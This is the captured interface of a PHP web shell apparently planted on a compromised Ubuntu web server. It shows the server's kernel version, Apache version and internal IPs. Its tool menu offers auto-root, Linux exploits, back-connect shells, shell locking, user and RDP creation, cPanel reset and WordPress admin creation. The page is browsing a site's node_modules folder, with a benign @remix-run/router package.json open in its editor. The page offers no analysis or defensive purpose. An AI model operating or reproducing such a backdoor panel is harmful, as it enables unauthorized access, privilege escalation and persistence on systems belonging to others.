Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
@remix-run /
router /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
CHANGELOG.md
52.02
KB
-rw-r--r--
LICENSE.md
1.13
KB
-rw-r--r--
README.md
5.73
KB
-rw-r--r--
history.ts
21.13
KB
-rw-r--r--
index.ts
2.4
KB
-rw-r--r--
package.json
701
B
-rw-r--r--
router.ts
180.15
KB
-rw-r--r--
utils.ts
47.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "@remix-run/router", "version": "1.23.0", "description": "Nested/Data-driven/Framework-agnostic Routing", "keywords": [ "remix", "router", "location" ], "repository": { "type": "git", "url": "https://github.com/remix-run/react-router", "directory": "packages/router" }, "license": "MIT", "author": "Remix Software <hello@remix.run>", "sideEffects": false, "main": "./dist/router.cjs.js", "unpkg": "./dist/router.umd.min.js", "module": "./dist/router.js", "types": "./dist/index.d.ts", "files": [ "dist/", "*.ts", "CHANGELOG.md" ], "engines": { "node": ">=14.0.0" }, "publishConfig": { "access": "public" } }
Close